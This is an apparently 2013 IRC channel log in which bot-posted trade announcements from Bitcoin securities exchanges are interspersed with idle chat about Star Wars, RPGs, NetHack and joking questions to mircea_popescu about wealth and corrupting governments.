19.88 BTC [+] Jun 29 22:36:29 [BTCTC] [ASICMINER-PT] 1 @ 3.9779 BTC [+] Jun 29 22:36:30 [BTCTC] [ASICMINER-PT] 4 @ 3.98 = 15.92 BTC [+] Jun 29 22:38:48 [BTCTC] [AMC-PT] 40 @ 0.001131 = 0.0452 BTC [-] Jun 29 22:39:49 [BTCTC] [ASICMINER-PT] 1 @ 3.969 BTC [-] Jun 29 22:40:12 [HAVELOCK] [VTX] 1 @ 0.51 BTC [+] Jun 29 22:41:00 lol @ selling potatoes in romania Jun 29 22:44:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.039799 BTC [+] Jun 29 22:44:21 nothing better than discussing the fortunes of btc's richest guy in dismissive terms. sorta paints a real man, not affraid of a challenge etc. Jun 29 22:45:11 [BTCTC] [ASICMINER-PT] 6 @ 3.890002 = 23.34 BTC [-] Jun 29 22:45:13 [BTCTC] [ASICMINER-PT] 1 @ 3.890001 BTC [-] Jun 29 22:45:15 [BTCTC] [ASICMINER-PT] 1 @ 3.89 BTC [-] Jun 29 22:45:17 [BTCTC] [ASICMINER-PT] 9 @ 3.880012 = 34.9201 BTC [-] Jun 29 22:45:19 [BTCTC] [ASICMINER-PT] 5 @ 3.85 = 19.25 BTC [-] Jun 29 22:45:20 also http://static.tvtropes.org/pmwiki/pub/images/jedi3_-_numeroquatro_4120_9346.jpg Jun 29 22:45:30 http://youtu.be/Krusn0Mo3Po so… Jun 29 22:45:33 He sells potato peelers and became a millionaire - YouTube Jun 29 22:47:02 [BTCTC] [AMC-PT] 9 @ 0.0012 = 0.0108 BTC [+] Jun 29 22:48:22 [BTCTC] [DMS.SELLING] 1 @ 0.03447 BTC [+] Jun 29 22:53:39 [BTCTC] [BASIC-MINING] 1 @ 0.189499 BTC [-] Jun 29 22:53:41 [BTCTC] [BASIC-MINING] 9 @ 0.1895 = 1.7055 BTC [+] Jun 29 22:54:06 [BTCTC] [BASIC-MINING] 1 @ 0.17 BTC [-] Jun 29 22:55:06 [MPEX] [S.MPOE] 11513 @ 0.00082451 = 9.4926 BTC [+] Jun 29 22:55:17 [MPEX] [S.MPOE] 2587 @ 0.00082486 = 2.1339 BTC [+] Jun 29 22:56:20 [BTCTC] [AMC-PT] 666 @ 0.00115 = 0.7659 BTC [-] Jun 29 22:56:43 [BTCTC] [AMC-PT] 31 @ 0.0012 = 0.0372 BTC [+] Jun 29 22:58:43 [BTCTC] [AMC-PT] 49 @ 0.00115 = 0.0564 BTC [-] Jun 29 22:58:45 [BTCTC] [BASIC-MINING] 4 @ 0.189498 = 0.758 BTC [+] Jun 29 22:58:50 [BTCTC] [CRYPTO-TRADE] 10 @ 0.2 = 2 BTC [+] Jun 29 22:59:33 didn't take you for a star wars fan mircea_popescu Jun 29 22:59:42 im not. Jun 29 22:59:55 i actually don't even know which space wars is. Jun 29 23:03:42 [BTCTC] [TAT.ASICMINER] 50 @ 0.0398 = 1.99 BTC [+] Jun 29 23:05:56 [HAVELOCK] [ASICM] 13 @ 0.03994899 = 0.5193 BTC [+] Jun 29 23:06:23 [BTCTC] [AMC-PT] 185 @ 0.00115 = 0.2128 BTC [-] Jun 29 23:06:25 [BTCTC] [AMC-PT] 160 @ 0.001131 = 0.181 BTC [-] Jun 29 23:06:27 [BTCTC] [AMC-PT] 650 @ 0.00113 = 0.7345 BTC [-] Jun 29 23:06:28 [BTCTC] [AMC-PT] 3 @ 0.00112 = 0.0034 BTC [-] Jun 29 23:06:30 [BTCTC] [AMC-PT] 202 @ 0.001112 = 0.2246 BTC [-] Jun 29 23:07:40 [BTCTC] [TAT.ASICMINER] 2 @ 0.0398 = 0.0796 BTC [+] Jun 29 23:08:19 [BTCTC] [TAT.ASICMINER] 60 @ 0.0398 = 2.388 BTC [+] Jun 29 23:12:31 [BTCTC] [ASICMINER-PT] 1 @ 3.923999 BTC [+] Jun 29 23:14:27 [MPEX] [S.MPOE] 7113 @ 0.00082486 = 5.8672 BTC [+] Jun 29 23:14:29 [MPEX] [S.MPOE] 4687 @ 0.00082655 = 3.874 BTC [+] Jun 29 23:14:30 [BTCTC] [AMC-PT] 31 @ 0.0013 = 0.0403 BTC [+] Jun 29 23:14:32 [BTCTC] [AMC-PT] 9 @ 0.00135 = 0.0122 BTC [+] Jun 29 23:17:04 [BTCTC] [ASICMINER-PT] 1 @ 3.9 BTC [-] Jun 29 23:17:53 [BTCTC] [ASICMINER-PT] 2 @ 3.924 = 7.848 BTC [+] Jun 29 23:17:54 [BTCTC] [BASIC-MINING] 9 @ 0.189 = 1.701 BTC [-] Jun 29 23:18:13 [BTCTC] [CRYPTO-TRADE] 19 @ 0.2 = 3.8 BTC [+] Jun 29 23:18:17 [BTCTC] [ASICMINER-PT] 1 @ 3.923 BTC [-] Jun 29 23:18:35 [BTCTC] [ASICMINER-PT] 1 @ 3.939 BTC [+] Jun 29 23:19:04 [BTCTC] [ASICMINER-PT] 1 @ 3.959 BTC [+] Jun 29 23:20:29 [BTCTC] [BITVPS] 224 @ 0.001258 = 0.2818 BTC [+] Jun 29 23:20:41 [BTCTC] [ASICMINER-PT] 1 @ 3.968 BTC [+] Jun 29 23:22:51 [BTCTC] [TAT.ASICMINER] 25 @ 0.0398 = 0.995 BTC [+] Jun 29 23:23:11 [BTCTC] [S.MPOE-PT] 12 @ 0.000999 = 0.012 BTC [+] Jun 29 23:23:13 [BTCTC] [S.MPOE-PT] 8 @ 0.000999 = 0.008 BTC [+] Jun 29 23:23:49 [BTCTC] [TAT.ASICMINER] 75 @ 0.0398 = 2.985 BTC [+] Jun 29 23:25:56 [BTCTC] [TAT.ASICMINER] 5 @ 0.0398 = 0.199 BTC [+] Jun 29 23:26:13 [HAVELOCK] [ASICM] 34 @ 0.039499 = 1.343 BTC [-] Jun 29 23:28:18 [HAVELOCK] [ASICM] 118 @ 0.039499 = 4.6609 BTC [-] Jun 29 23:28:24 [HAVELOCK] [ASICM] 7 @ 0.0395 = 0.2765 BTC [+] Jun 29 23:28:50 [BTCTC] [ASICMINER-PT] 2 @ 3.968 = 7.936 BTC [+] Jun 29 23:28:51 [BTCTC] [ASICMINER-PT] 1 @ 3.969 BTC [+] Jun 29 23:30:12 [BTCTC] [TAT.ASICMINER] 6 @ 0.0398 = 0.2388 BTC [+] Jun 29 23:31:30 [BTCTC] [S.MPOE-PT] 21 @ 0.000999 = 0.021 BTC [+] Jun 29 23:31:46 [BTCTC] [TAT.ASICMINER] 13 @ 0.0398 = 0.5174 BTC [+] Jun 29 23:31:53 [BTCTC] [S.DICE-PT] 7 @ 0.002249 = 0.0157 BTC [+] Jun 29 23:31:55 [BTCTC] [S.DICE-PT] 2 @ 0.002249 = 0.0045 BTC [+] Jun 29 23:32:31 [BTCTC] [DMS.MINING] 1 @ 0.023199 BTC [+] Jun 29 23:35:37 [BTCTC] [TAT.ASICMINER] 40 @ 0.0398 = 1.592 BTC [+] Jun 29 23:36:08 [BTCTC] [COGNITIVE] 3 @ 0.441058 = 1.3232 BTC [-] Jun 29 23:37:52 [BTCTC] [TAT.ASICMINER] 24 @ 0.0398 = 0.9552 BTC [+] Jun 29 23:37:57 [BTCTC] [TAT.ASICMINER] 26 @ 0.0398 = 1.0348 BTC [+] Jun 29 23:40:56 [BTCTC] [COGNITIVE] 1 @ 0.441057 BTC [-] Jun 29 23:44:28 [BTCTC] [AMC-PT] 40 @ 0.0013 = 0.052 BTC [-] Jun 29 23:44:30 [BTCTC] [AMC-PT] 110 @ 0.0013 = 0.143 BTC [-] Jun 29 23:45:17 [BTCTC] [AMC-PT] 2 @ 0.0013 = 0.0026 BTC [-] Jun 29 23:46:54 [BTCTC] [TAT.VIRTUALMINE] 46 @ 0.005221 = 0.2402 BTC [-] Jun 29 23:46:56 [BTCTC] [TAT.VIRTUALMINE] 9 @ 0.00522 = 0.047 BTC [-] Jun 29 23:46:58 [BTCTC] [TAT.VIRTUALMINE] 51 @ 0.00521 = 0.2657 BTC [-] Jun 29 23:48:37 [BTCTC] [TAT.VIRTUALMINE] 300 @ 0.0052 = 1.56 BTC [-] Jun 29 23:50:07 "RPG characters are young. Very young. The average age seems to be 15, unless the character is a decorated and battle-hardened soldier, in which case he might even be as old as 18. Such teenagers often have skills with multiple weapons and magic, years of experience, and never ever worry about their parents telling them to come home from adventuring before bedtime." Jun 29 23:50:16 dude. BTC is a RPG. Jun 29 23:50:30 i've been saying this for ages, but apparently i've been too genreblind to realise the implication. Jun 29 23:50:38 [BTCTC] [TAT.ASICMINER] 5 @ 0.0398 = 0.199 BTC [+] Jun 29 23:52:21 hehe Jun 29 23:54:08 so we just need to start mapping experience points onto the block chain, and your game is finished! Jun 29 23:54:53 [BTCTC] [COGNITIVE] 4 @ 0.441057 = 1.7642 BTC [-] Jun 29 23:55:50 [BTCTC] [AMC-PT] 400 @ 0.001114 = 0.4456 BTC [-] Jun 29 23:55:57 [BTCTC] [TAT.ASICMINER] 7 @ 0.0398 = 0.2786 BTC [+] Jun 29 23:57:31 i think that's the postcunt. Jun 29 23:57:48 [BTCTC] [AMC-PT] 200 @ 0.001325 = 0.265 BTC [+] Jun 29 23:58:50 [BTCTC] [ASICMINER-PT] 1 @ 3.968 BTC [-] Jun 30 00:01:41 [BTCTC] [ASICMINER-PT] 1 @ 3.968 BTC [-] Jun 30 00:02:51 [BTCTC] [AMC-PT] 300 @ 0.0012 = 0.36 BTC [-] Jun 30 00:02:53 [BTCTC] [AMC-PT] 100 @ 0.0012 = 0.12 BTC [-] Jun 30 00:04:12 [BTCTC] [TAT.ASICMINER] 90 @ 0.0398 = 3.582 BTC [+] Jun 30 00:05:59 mircea_popescu: when are you going to be a billionaire? Jun 30 00:06:16 what diff does it make ? Jun 30 00:07:47 cause you'll own everything at that point? Jun 30 00:07:59 everything is worth more than a billion. Jun 30 00:09:24 I meant power-wise Jun 30 00:09:34 you'll have your hooks in every government accross the world Jun 30 00:09:36 which currency? Jun 30 00:10:06 there's only 21 mil :) Jun 30 00:12:06 :p Jun 30 00:12:48 [BTCTC] [AMC-PT] 200 @ 0.001116 = 0.2232 BTC [-] Jun 30 00:12:50 [BTCTC] [AMC-PT] 650 @ 0.001115 = 0.7248 BTC [-] Jun 30 00:12:52 [BTCTC] [AMC-PT] 300 @ 0.001114 = 0.3342 BTC [-] Jun 30 00:12:53 [BTCTC] [AMC-PT] 200 @ 0.001113 = 0.2226 BTC [-] Jun 30 00:12:55 [BTCTC] [AMC-PT] 77 @ 0.001112 = 0.0856 BTC [-] Jun 30 00:12:56 [BTCTC] [AMC-PT] 100 @ 0.001111 = 0.1111 BTC [-] Jun 30 00:12:57 [BTCTC] [AMC-PT] 3 @ 0.0011 = 0.0033 BTC [-] Jun 30 00:12:59 [BTCTC] [AMC-PT] 375 @ 0.001002 = 0.3758 BTC [-] Jun 30 00:13:00 [BTCTC] [AMC-PT] 500 @ 0.001001 = 0.5005 BTC [-] Jun 30 00:13:00 [BTCTC] [AMC-PT] 595 @ 0.001 = 0.595 BTC [-] Jun 30 00:13:36 [MPEX] [S.MPOE] 3513 @ 0.00082655 = 2.9037 BTC [+] Jun 30 00:13:37 [MPEX] [S.MPOE] 4250 @ 0.00082744 = 3.5166 BTC [+] Jun 30 00:13:51 [MPEX] [S.MPOE] 10587 @ 0.00082751 = 8.7608 BTC [+] Jun 30 00:14:18 [MPEX] [S.MPOE] 7150 @ 0.00082437 = 5.8942 BTC [-] Jun 30 00:14:34 [MPEX] [S.MPOE] 15750 @ 0.00082313 = 12.9643 BTC [-] Jun 30 00:15:10 [BTCTC] [AMC-PT] 400 @ 0.001 = 0.4 BTC [-] Jun 30 00:15:12 [BTCTC] [AMC-PT] 500 @ 0.001 = 0.5 BTC [-] Jun 30 00:15:13 [BTCTC] [AMC-PT] 1100 @ 0.001 = 1.1 BTC [-] Jun 30 00:15:50 [BTCTC] [CRYPTO-TRADE] 18 @ 0.2 = 3.6 BTC [+] Jun 30 00:16:22 [BTCTC] [TAT.ASICMINER] 25 @ 0.0398 = 0.995 BTC [+] Jun 30 00:16:55 [BTCTC] [TAT.ASICMINER] 79 @ 0.0398 = 3.1442 BTC [+] Jun 30 00:16:59 [BTCTC] [TAT.ASICMINER] 2 @ 0.0398 = 0.0796 BTC [+] Jun 30 00:17:03 [BTCTC] [AMC-PT] 450 @ 0.001325 = 0.5963 BTC [+] Jun 30 00:17:39 LEMME REPHRASE THE QUESTION Jun 30 00:17:57 mircea_popescu: when will you have the leverage to corrupt governments? Jun 30 00:18:30 will ? Jun 30 00:18:47 you can already corrupt governments? Jun 30 00:18:53 [BTCTC] [AMC-PT] 100 @ 0.00102 = 0.102 BTC [-] Jun 30 00:18:56 [BTCTC] [AMC-PT] 200 @ 0.00101 = 0.202 BTC [-] Jun 30 00:18:58 [BTCTC] [ASICMINER-PT] 2 @ 3.977 = 7.954 BTC [+] Jun 30 00:19:01 [BTCTC] [ASICMINER-PT] 1 @ 3.978 BTC [+] Jun 30 00:19:02 government is corrupt by design Jun 30 00:19:03 [BTCTC] [ASICMINER-PT] 1 @ 3.979 BTC [+] Jun 30 00:19:05 [BTCTC] [ASICMINER-PT] 1 @ 3.97999 BTC [+] Jun 30 00:19:28 works pretty nicely Jun 30 00:19:53 [BTCTC] [AMC-PT] 100 @ 0.00102 = 0.102 BTC [+] Jun 30 00:19:55 [BTCTC] [AMC-PT] 200 @ 0.00101 = 0.202 BTC [-] Jun 30 00:20:05 sucks if you expect it to be fair though Jun 30 00:20:08 It's fun watching TV shows pre 2004 Jun 30 00:22:23 [BTCTC] [ASICMINER-PT] 2 @ 3.979 = 7.958 BTC [-] Jun 30 00:22:24 [BTCTC] [ASICMINER-PT] 1 @ 3.979999 BTC [+] Jun 30 00:23:50 [BTCTC] [ASICMINER-PT] 2 @ 3.979 = 7.958 BTC [-] Jun 30 00:25:39 [MPEX] [S.MPOE] 18063 @ 0.00082751 = 14.9473 BTC [+] Jun 30 00:25:41 [MPEX] [S.MPOE] 4437 @ 0.00082763 = 3.6722 BTC [+] Jun 30 00:26:11 [BTCTC] [ASICMINER-PT] 8 @ 3.979999 = 31.84 BTC [+] Jun 30 00:28:00 [BTCTC] [TAT.ASICMINER] 25 @ 0.0395 = 0.9875 BTC [-] Jun 30 00:29:16 [BTCTC] [TAT.ASICMINER] 30 @ 0.039101 = 1.173 BTC [-] Jun 30 00:29:40 [BTCTC] [ASICMINER-PT] 1 @ 3.978 BTC [-] Jun 30 00:29:58 [BTCTC] [ASICMINER-PT] 1 @ 3.978 BTC [-] Jun 30 00:30:09 [BTCTC] [ASICMINER-PT] 1 @ 3.979 BTC [+] Jun 30 00:30:16 [BTCTC] [ASICMINER-PT] 3 @ 3.979 = 11.937 BTC [+] Jun 30 00:31:10 [BTCTC] [ASICMINER-PT] 1 @ 3.979 BTC [+] Jun 30 00:31:20 [HAVELOCK] [ASICM] 45 @ 0.03860202 = 1.7371 BTC [-] Jun 30 00:31:21 [HAVELOCK] [ASICM] 125 @ 0.03860102 = 4.8251 BTC [-] Jun 30 00:31:23 [HAVELOCK] [ASICM] 2 @ 0.0386 = 0.0772 BTC [-] Jun 30 00:31:24 [HAVELOCK] [ASICM] 17 @ 0.03851 = 0.6547 BTC [-] Jun 30 00:31:25 [HAVELOCK] [ASICM] 129 @ 0.0385 = 4.9665 BTC [-] Jun 30 00:31:34 [BTCTC] [ASICMINER-PT] 1 @ 3.98 BTC [+] Jun 30 00:32:32 [HAVELOCK] [ASICM] 21 @ 0.0385 = 0.8085 BTC [-] Jun 30 00:32:48 http://alt.org/nethack/ Jun 30 00:32:52 there we go. Jun 30 00:32:54 alt.org - Public NetHack Server Jun 30 00:33:42 you're going to need to do better than that Jun 30 00:35:55 [BTCTC] [TAT.ASICMINER] 30 @ 0.039799 = 1.194 BTC [+] Jun 30 00:35:57 [BTCTC] [TAT.ASICMINER] 39 @ 0.0398 = 1.5522 BTC [+] Jun 30 00:38:39 i have tried and therefore. Jun 30 00:38:43 ihtat. Jun 30 00:38:54 what does the squiggly thing on some btctctcotc assets mean Jun 30 00:39:58 eg amc-pt and basic-mining Jun 30 00:42:37 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [-] Jun 30 00:42:38 [BTCTC] [TAT.ASICMINER] 14 @ 0.0398 = 0.5572 BTC [+] Jun 30 00:43:23 [BTCTC] [ASICMINER-PT] 1 @ 3.977 BTC [+] Jun 30 00:43:47 [MPEX] [S.MPOE] 4777 @ 0.00082763 = 3.9536 BTC [+] Jun 30 00:44:39 [HAVELOCK] [ASICM] 8 @ 0.039939 = 0.3195 BTC [+] Jun 30 00:46:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.001 BTC [-] Jun 30 00:50:18 [BTCTC] [AMC-PT] 890 @ 0.00115 = 1.0235 BTC [+] Jun 30 00:50:27 [BTCTC] [AMC-PT] 1000 @ 0.0011 = 1.1 BTC [-] Jun 30 00:50:29 [BTCTC] [AMC-PT] 928 @ 0.00108 = 1.0022 BTC [-] Jun 30 00:53:45 [BTCTC] [ASICMINER-PT] 1 @ 3.921147 BTC [-] Jun 30 00:53:47 [BTCTC] [ASICMINER-PT] 1 @ 3.921145 BTC [-] Jun 30 00:53:49 [BTCTC] [ASICMINER-PT] 1 @ 3.921141 BTC [-] Jun 30 00:54:14 [BTCTC] [AMC-PT] 10 @ 0.0012 = 0.012 BTC [+] Jun 30 00:56:06 [BTCTC] [TAT.ASICMINER] 6 @ 0.0398 = 0.2388 BTC [+] Jun 30 00:56:49 [BTCTC] [AMC-PT] 10 @ 0.00125 = 0.0125 BTC [+] Jun 30 00:56:53 [BTCTC] [AMC-PT] 50 @ 0.0012 = 0.06 BTC [-] Jun 30 01:08:48 [BTCTC] [B.YABMC] 1 @ 0.005015 BTC [-] Jun 30 01:11:04 [BTCTC] [B.YABMC] 3 @ 0.005697 = 0.0171 BTC [+] Jun 30 01:12:40 [BTCTC] [CRYPTO-TRADE] 2 @ 0.199 = 0.398 BTC [-] Jun 30 01:13:59 [BTCTC] [TAT.ASICMINER] 10 @ 0.0398 = 0.398 BTC [+] Jun 30 01:14:52 [MPEX] [S.MPOE] 8074 @ 0.00082408 = 6.6536 BTC [-] Jun 30 01:15:26 [BTCTC] [TAT.ASICMINER] 10 @ 0.0398 = 0.398 BTC [+] Jun 30 01:17:21 [BTCTC] [DMS.MINING] 1 @ 0.022 BTC [-] Jun 30 01:17:23 [BTCTC] [DMS.MINING] 1 @ 0.022 BTC [-] Jun 30 01:17:24 [BTCTC] [DMS.MINING] 10 @ 0.021002 = 0.21 BTC [-] Jun 30 01:17:26 [BTCTC] [DMS.MINING] 55 @ 0.021001 = 1.1551 BTC [-] Jun 30 01:17:27 [BTCTC] [DMS.MINING] 11 @ 0.021 = 0.231 BTC [-] Jun 30 01:17:28 [BTCTC] [DMS.MINING] 20 @ 0.0205 = 0.41 BTC [-] Jun 30 01:17:29 [BTCTC] [DMS.MINING] 1 @ 0.0205 BTC [-] Jun 30 01:17:30 [BTCTC] [DMS.MINING] 1 @ 0.020128 BTC [-] Jun 30 01:17:32 [BTCTC] [DMS.MINING] 1 @ 0.020128 BTC [-] Jun 30 01:17:33 [BTCTC] [DMS.MINING] 1 @ 0.020128 BTC [-] Jun 30 01:18:09 [BTCTC] [DMS.PURCHASE] 103 @ 0.053474 = 5.5078 BTC [+] Jun 30 01:18:17 [BTCTC] [BASIC-MINING] 1 @ 0.17 BTC [-] Jun 30 01:19:54 [HAVELOCK] [ASICM] 90 @ 0.0395 = 3.555 BTC [-] Jun 30 01:19:55 [HAVELOCK] [ASICM] 125 @ 0.03959999 = 4.95 BTC [+] Jun 30 01:19:57 [HAVELOCK] [ASICM] 91 @ 0.0396 = 3.6036 BTC [+] Jun 30 01:19:58 [HAVELOCK] [ASICM] 20 @ 0.03994899 = 0.799 BTC [+] Jun 30 01:23:13 [MPEX] [S.MPOE] 4400 @ 0.00082313 = 3.6218 BTC [-] Jun 30 01:23:15 [MPEX] [S.MPOE] 12100 @ 0.00082252 = 9.9525 BTC [-] Jun 30 01:23:31 [BTCTC] [ASICMINER-PT] 1 @ 3.968963 BTC [+] Jun 30 01:24:05 [HAVELOCK] [ASICM] 10 @ 0.039 = 0.39 BTC [-] Jun 30 01:24:38 [BTCTC] [TAT.ASICMINER] 25 @ 0.0398 = 0.995 BTC [+] Jun 30 01:24:59 it seems asicminer has no upper limit Jun 30 01:27:58 up up up Jun 30 01:39:17 [HAVELOCK] [HIM] 34 @ 0.332499 = 11.305 BTC [+] Jun 30 01:41:45 [BTCTC] [TAT.ASICMINER] 90 @ 0.03979 = 3.5811 BTC [-] Jun 30 01:47:36 [BTCTC] [TAT.ASICMINER] 10 @ 0.0398 = 0.398 BTC [+] Jun 30 01:47:41 [BTCTC] [DMS.PURCHASE] 150 @ 0.053474 = 8.0211 BTC [+] Jun 30 01:47:48 [BTCTC] [TAT.ASICMINER] 85 @ 0.03979 = 3.3822 BTC [-] Jun 30 01:48:21 [BTCTC] [ASICMINER-PT] 1 @ 3.968897 BTC [-] Jun 30 01:48:44 [MPEX] [S.MPOE] 1550 @ 0.00082252 = 1.2749 BTC [-] Jun 30 01:48:48 [BTCTC] [TAT.ASICMINER] 10 @ 0.039223 = 0.3922 BTC [-] Jun 30 01:49:21 [BTCTC] [ASICMINER-PT] 1 @ 3.968898 BTC [+] Jun 30 01:50:10 [BTCTC] [TAT.ASICMINER] 10 @ 0.039799 = 0.398 BTC [+] Jun 30 01:50:28 [BTCTC] [ASICMINER-PT] 2 @ 3.95 = 7.9 BTC [-] Jun 30 01:50:35 [BTCTC] [ASICMINER-PT] 1 @ 3.921008 BTC [-] Jun 30 01:50:37 [BTCTC] [ASICMINER-PT] 1 @ 3.921007 BTC [-] Jun 30 01:50:39 [BTCTC] [ASICMINER-PT] 1 @ 3.921006 BTC [-] Jun 30 01:50:41 [BTCTC] [ASICMINER-PT] 1 @ 3.921005 BTC [-] Jun 30 01:50:43 [BTCTC] [ASICMINER-PT] 9 @ 3.921001 = 35.289 BTC [-] Jun 30 01:50:46 [BTCTC] [TAT.ASICMINER] 41 @ 0.0398 = 1.6318 BTC [+] Jun 30 01:50:47 [BTCTC] [ASICMINER-PT] 5 @ 3.921 = 19.605 BTC [-] Jun 30 01:50:55 [BTCTC] [COGNITIVE] 5 @ 0.4421 = 2.2105 BTC [+] Jun 30 01:51:48 [BTCTC] [TAT.ASICMINER] 22 @ 0.03979 = 0.8754 BTC [-] Jun 30 01:53:41 [BTCTC] [ASICMINER-PT] 1 @ 3.968896 BTC [+] Jun 30 01:53:42 [BTCTC] [ASICMINER-PT] 1 @ 3.968897 BTC [+] Jun 30 01:53:44 [BTCTC] [ASICMINER-PT] 1 @ 3.968898 BTC [+] Jun 30 01:53:46 [BTCTC] [ASICMINER-PT] 1 @ 3.968899 BTC [+] Jun 30 01:53:48 [BTCTC] [ASICMINER-PT] 1 @ 3.9689 BTC [+] Jun 30 01:53:49 [HAVELOCK] [ASICM] 40 @ 0.039 = 1.56 BTC [-] Jun 30 02:00:43 [BTCTC] [AMC-PT] 6 @ 0.0011 = 0.0066 BTC [-] Jun 30 02:02:50 [MPEX] [S.MPOE] 2350 @ 0.00082062 = 1.9285 BTC [-] Jun 30 02:02:59 [MPEX] [S.MPOE] 18276 @ 0.00082408 = 15.0609 BTC [+] Jun 30 02:08:57 [BTCTC] [ASICMINER-PT] 1 @ 3.968998 BTC [+] Jun 30 02:08:59 [HAVELOCK] [VTX] 5 @ 0.500001 = 2.5 BTC [-] Jun 30 02:09:00 [HAVELOCK] [VTX] 5 @ 0.5 = 2.5 BTC [-] Jun 30 02:10:06 [HAVELOCK] [ASICM] 1 @ 0.039699 BTC [+] Jun 30 02:12:59 [HAVELOCK] [ASICM] 5 @ 0.039699 = 0.1985 BTC [+] Jun 30 02:20:54 [BTCTC] [DMS.SELLING] 7 @ 0.03399 = 0.2379 BTC [-] Jun 30 02:24:13 [BTCTC] [DMS.MINING] 4 @ 0.020011 = 0.08 BTC [-] Jun 30 02:24:16 [BTCTC] [DMS.MINING] 4 @ 0.02001 = 0.08 BTC [-] Jun 30 02:24:18 [BTCTC] [AMC-PT] 100 @ 0.0012 = 0.12 BTC [+] Jun 30 02:25:45 [BTCTC] [AMC-PT] 11 @ 0.0012 = 0.0132 BTC [+] Jun 30 02:25:47 [BTCTC] [AMC-PT] 89 @ 0.0012 = 0.1068 BTC [+] Jun 30 02:27:22 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.004999 = 0.05 BTC [-] Jun 30 02:27:43 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0049 BTC [-] Jun 30 02:28:24 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.004852 = 0.0243 BTC [-] Jun 30 02:28:47 [BTCTC] [AMC-PT] 994 @ 0.0011 = 1.0934 BTC [-] Jun 30 02:28:49 [BTCTC] [AMC-PT] 284 @ 0.00102 = 0.2897 BTC [-] Jun 30 02:28:54 [BTCTC] [TAT.ASICMINER] 2 @ 0.03979 = 0.0796 BTC [-] Jun 30 02:29:30 [BTCTC] [TAT.ASICMINER] 34 @ 0.03979 = 1.3529 BTC [-] Jun 30 02:31:16 [BTCTC] [AMC-PT] 10 @ 0.0012 = 0.012 BTC [+] Jun 30 02:31:23 [BTCTC] [COGNITIVE] 41 @ 0.4421 = 18.1261 BTC [+] Jun 30 02:31:25 [BTCTC] [COGNITIVE] 3 @ 0.44101 = 1.323 BTC [-] Jun 30 02:31:26 [BTCTC] [COGNITIVE] 10 @ 0.44 = 4.4 BTC [-] Jun 30 02:31:28 [BTCTC] [COGNITIVE] 1 @ 0.43516 BTC [-] Jun 30 02:31:29 [BTCTC] [COGNITIVE] 11 @ 0.4226 = 4.6486 BTC [-] Jun 30 02:31:30 [BTCTC] [COGNITIVE] 16 @ 0.4225 = 6.76 BTC [-] Jun 30 02:31:32 [BTCTC] [COGNITIVE] 10 @ 0.42 = 4.2 BTC [-] Jun 30 02:31:33 [BTCTC] [COGNITIVE] 2 @ 0.4 = 0.8 BTC [-] Jun 30 02:31:33 [BTCTC] [COGNITIVE] 50 @ 0.399001 = 19.9501 BTC [-] Jun 30 02:31:35 [BTCTC] [COGNITIVE] 1 @ 0.384999 BTC [-] Jun 30 02:31:36 [BTCTC] [COGNITIVE] 21 @ 0.3483 = 7.3143 BTC [-] Jun 30 02:31:37 [BTCTC] [COGNITIVE] 1 @ 0.3108 BTC [-] Jun 30 02:31:38 [BTCTC] [COGNITIVE] 5 @ 0.300004 = 1.5 BTC [-] Jun 30 02:31:39 [BTCTC] [COGNITIVE] 19 @ 0.300003 = 5.7001 BTC [-] Jun 30 02:31:41 [BTCTC] [COGNITIVE] 1 @ 0.3 BTC [-] Jun 30 02:32:51 [HAVELOCK] [ASICM] 11 @ 0.039899 = 0.4389 BTC [+] Jun 30 02:33:18 [BTCTC] [COGNITIVE] 1 @ 0.14 BTC [-] Jun 30 02:34:46 [HAVELOCK] [ASICM] 100 @ 0.0399 = 3.99 BTC [+] Jun 30 02:34:47 [HAVELOCK] [ASICM] 5 @ 0.03994999 = 0.1997 BTC [+] Jun 30 02:34:48 [HAVELOCK] [ASICM] 95 @ 0.03995 = 3.7953 BTC [+] Jun 30 02:39:13 [HAVELOCK] [ASICM] 4 @ 0.039899 = 0.1596 BTC [-] Jun 30 02:42:18 [BTCTC] [COG.F] 1 @ 3.8 BTC [-] Jun 30 02:42:40 [BTCTC] [COGNITIVE] 10 @ 0.3 = 3 BTC [+] Jun 30 02:42:49 [HAVELOCK] [HIM] 8 @ 0.329999 = 2.64 BTC [-] Jun 30 02:43:38 [HAVELOCK] [ASICM] 17 @ 0.0399 = 0.6783 BTC [+] Jun 30 02:47:32 [BTCTC] [BITVPS] 15 @ 0.001151 = 0.0173 BTC [-] Jun 30 02:47:34 [BTCTC] [BITVPS] 10 @ 0.001151 = 0.0115 BTC [-] Jun 30 02:47:35 [BTCTC] [BITVPS] 428 @ 0.00115 = 0.4922 BTC [-] Jun 30 02:47:37 [BTCTC] [BITVPS] 46 @ 0.0011 = 0.0506 BTC [-] Jun 30 02:47:38 [BTCTC] [BITVPS] 496 @ 0.001006 = 0.499 BTC [-] Jun 30 02:47:40 [BTCTC] [BITVPS] 100 @ 0.001005 = 0.1005 BTC [-] Jun 30 02:47:41 [BTCTC] [BITVPS] 100 @ 0.00095 = 0.095 BTC [-] Jun 30 02:47:42 [BTCTC] [BITVPS] 100 @ 0.00094 = 0.094 BTC [-] Jun 30 02:47:44 [BTCTC] [BITVPS] 1 @ 0.00092 BTC [-] Jun 30 02:47:45 [BTCTC] [BITVPS] 6 @ 0.00092 = 0.0055 BTC [-] Jun 30 02:47:47 [BTCTC] [BITVPS] 100 @ 0.0009 = 0.09 BTC [-] Jun 30 02:47:48 [BTCTC] [BITVPS] 1100 @ 0.0009 = 0.99 BTC [-] Jun 30 02:49:36 [BTCTC] [ASICMINER-PT] 1 @ 3.923004 BTC [-] Jun 30 02:49:38 [BTCTC] [ASICMINER-PT] 1 @ 3.923003 BTC [-] Jun 30 02:49:40 [BTCTC] [ASICMINER-PT] 1 @ 3.922 BTC [-] Jun 30 02:49:42 [BTCTC] [ASICMINER-PT] 2 @ 3.921 = 7.842 BTC [-] Jun 30 02:49:44 [BTCTC] [ASICMINER-PT] 1 @ 3.92 BTC [-] Jun 30 02:55:46 [BTCTC] [TAT.ASICMINER] 2 @ 0.03979 = 0.0796 BTC [-] Jun 30 02:56:10 [BTCTC] [AMC-PT] 16 @ 0.00102 = 0.0163 BTC [-] Jun 30 02:56:12 [BTCTC] [AMC-PT] 25 @ 0.00102 = 0.0255 BTC [-] Jun 30 02:56:13 [BTCTC] [AMC-PT] 312 @ 0.001011 = 0.3154 BTC [-] Jun 30 02:58:04 